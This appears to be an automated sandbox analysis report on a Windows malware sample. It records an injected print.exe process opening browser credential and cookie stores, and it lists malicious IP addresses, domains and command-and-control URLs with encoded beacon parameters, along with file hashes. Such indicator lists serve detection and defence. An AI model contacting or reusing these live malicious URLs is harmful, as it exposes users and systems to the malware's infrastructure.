Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\print.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
122.10.12.59	2xin1.zhanghonghong.com	Hong Kong	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
52.9.242.57	www.theranchobizarro.com	United States	16509	AMAZON-02US	true
212.32.237.90	www.sportspaj.com	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
167.172.228.26	nexgen-gaming.com	United States	14061	DIGITALOCEAN-ASNUS	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true
66.29.154.248	www.slimdut.top	United States	19538	ADVANTAGECOMUS	true
104.21.92.135	www.otomain.info	United States	13335	CLOUDFLARENETUS	true
119.18.54.85	gpcamservices.com	India	394695	PUBLIC-DOMAIN-REGISTRYUS	true
216.40.34.41	www.hugelmann.org	Canada	15348	TUCOWSCA	true

Name	Malicious	Antivirus Detection	Reputation
http://www.theranchobizarro.com/fgkz/	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.pheonix-travels.com/fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTj	true	Avira URL Cloud: safe	unknown
http://www.slimdut.top/fgkz/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.slimdut.top/fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTj	true	Avira URL Cloud: safe	unknown
http://www.sciencebot.sbs/fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj	true	Avira URL Cloud: malware	unknown
http://www.uty803.com/fgkz/	true	Avira URL Cloud: safe	unknown
http://www.noobblaster.com/fgkz/	true	Avira URL Cloud: safe	unknown
http://www.noobblaster.com/fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTj	true	Avira URL Cloud: safe	unknown
http://www.sportspaj.com/fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ==	true	Avira URL Cloud: safe	unknown
http://www.otomain.info/fgkz/	true	Avira URL Cloud: safe	unknown
http://www.nexgen-gaming.com/fgkz/	true	Avira URL Cloud: malware	unknown
http://www.hugelmann.org/fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTj	true	Avira URL Cloud: safe	unknown
http://www.hugelmann.org/fgkz/	true	Avira URL Cloud: safe	unknown
http://www.sciencebot.sbs/fgkz/	true	Avira URL Cloud: malware	unknown
http://www.sportspaj.com/fgkz/	true	Avira URL Cloud: safe	unknown
http://www.theranchobizarro.com/fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj	true	Avira URL Cloud: malware	unknown
http://www.gpcamservices.com/fgkz/	true	Avira URL Cloud: safe	unknown
http://www.nathanladd.software/fgkz/	true	Avira URL Cloud: safe	unknown
http://www.uty803.com/fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTj	true	Avira URL Cloud: safe	unknown
http://www.nexgen-gaming.com/fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ==	true	Avira URL Cloud: malware	unknown

ID:	1501599
Product:	CloudBasic
Start time:	07:17:07
Start date:	30.08.2024
Sample:	UnmxRI.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e34c33903020a81f3a09a69c29ade426
SHA1:	864aaa5821e9f3e99da71eff1c8b76bcd1cdea80
SHA256:	c9062d78ee63874928e2d332a8ed0570e99bc06e544e33f002b26f70e0c19510
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%